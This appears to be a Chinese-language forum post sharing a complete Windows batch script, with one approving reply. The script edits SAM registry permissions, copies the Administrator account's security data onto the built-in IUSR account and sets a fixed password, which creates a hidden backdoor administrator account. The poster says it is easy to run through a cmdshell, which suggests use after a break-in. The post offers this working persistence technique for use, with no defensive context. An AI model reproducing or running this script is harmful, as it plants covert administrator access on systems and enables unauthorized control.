复制并真正隐藏administrator帐号(完全批处理)

linhai

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现，贴出来吧

1. echo off
   
2. setlocal enabledelayedexpansion
   
3. echo %computername%
   
4. echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
   
5. regini "%windir%\..\1.reg"
   
6. regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
   
7. rem unicode ->ascii
   
8. type "%windir%\..\1.reg" >"%windir%\..\2.reg"
   
9. del /q "%windir%\..\1.reg"
   
10. rem find IUSR_%computername% 的对应id
    
11. for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
    
12. del /q "%windir%\..\2.reg"
    
13. rem export administrator register
    
14. regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
    
15. type "%windir%\..\1.reg" >"%windir%\..\2.reg"
    
16. del /q "%windir%\..\1.reg"
    
17. rem replace 1fx->iusr_id
    
18. for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
    
19. for /f "tokens=*" %%j in ("%%i") do (
    
20. set TMP=%%j
    
21. set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
    
22. echo !TMP!>>%windir%\..\1.reg
    
23. )
    
24. )
    
25. regedit /s %windir%\..\1.reg
    
26. del /q %windir%\..\1.reg
    
27. del /q %windir%\..\2.reg
    
28. echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
    
29. regini "%windir%\..\1.reg"
    
30. del /q "%windir%\..\1.reg"
    
31. net user IUSR_%computername% 12345678

复制代码

克隆出来的用户名是固定的,随便变换的话要改代码

pupu01

不错，按此方法试试看